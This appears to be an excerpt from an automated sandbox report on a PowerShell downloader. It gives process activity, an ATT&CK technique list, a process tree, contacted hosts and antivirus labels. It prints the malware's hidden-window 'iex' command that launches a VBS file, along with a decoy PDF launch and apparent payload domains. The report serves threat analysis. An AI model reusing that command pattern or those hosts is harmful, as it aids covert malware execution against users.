      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.1786312887.000001CA73401000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DV
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000008.00000002.2706581492.00000268AD454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2705375628.00000268A7E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_3284.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exe | Queries volume information on (consecutive repeats collapsed):
- C:\ProgramData\Microsoft\Network\Downloader\edb.chk
- C:\ProgramData\Microsoft\Network\Downloader\edb.log
- C:\ProgramData\Microsoft\Network\Downloader\edb.chk
- C:\ProgramData\Microsoft\Network\Downloader\edb.log [x3]
- C:\ProgramData\Microsoft\Network\Downloader\edb.chk
- C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
- C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
- C:\ProgramData\Microsoft\Network\Downloader\qmgr.db [x2]
- C:\ [x2]

These are the BITS job database (qmgr.db) and its ESE log and checkpoint files. The behavior graph attributes only a 127.0.0.1 connection to this svchost.exe, the strings recovered from qmgr.db and edb.log are g.live.com/odclientsettings URLs (OneDrive client settings), and the sample's downloads appear on powershell.exe's own connections, so the report gives no evidence that the script queued a BITS job; treat these rows as background service activity unless other evidence says otherwise.
MITRE ATT&CK matrix. The table is reproduced as a per-tactic list of the techniques that carry a badge in the report; the number in parentheses is the badge value exactly as extracted. Joe Sandbox's template cells that carry no badge (no matching signature) are omitted.

Resource Development: Scripting (1)
Execution: PowerShell (1)
Persistence: Scripting (1); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (21)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (4)
Behavior graph (ID 1578230; sample H6epOhxoPY.ps1; start date 19/12/2024; architecture WINDOWS; score 84), rendered as a process tree. Numbers in square brackets are the graph's created-file / created-registry-value badges, reproduced as extracted.

Start
  DNS/IP: x1.i.lencr.org; www.bluemaxxlaser.com; 5 other IPs or domains
  Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures
  |
  +-- powershell.exe [16, 23]
  |     Network: www.bluemaxxlaser.com, 203.175.174.69, port 80 (local port 49707), SGGS-AS-APSGGSSG, Singapore
  |              astenterprises.com.pk, 107.161.23.150, port 443 (local port 49704), RAMNODEUS, United States
  |     Signature: Powershell creates an autostart link
  |     +-- powershell.exe [23]
  |     |     Signature: Loading BitLocker PowerShell Module
  |     +-- Acrobat.exe [20, 61]
  |     |     +-- AcroCEF.exe [105]
  |     |           +-- AcroCEF.exe
  |     +-- conhost.exe
  +-- svchost.exe
        Network: 127.0.0.1 (unknown, unknown)

Antivirus results for the submitted file:

Source | Detection | Scanner | Label
H6epOhxoPY.ps1 | 44% | Virustotal |
H6epOhxoPY.ps1 | 34% | ReversingLabs | Script-PowerShell.Downloader.Boxter
H6epOhxoPY.ps1 | 100% | Avira | TR/PShell.Dldr.VPA

The three sections that follow in the report (dropped files, unpacked PE files, domains) had no antivirus matches.
URL scanner results:

Source | Detection | Scanner | Label
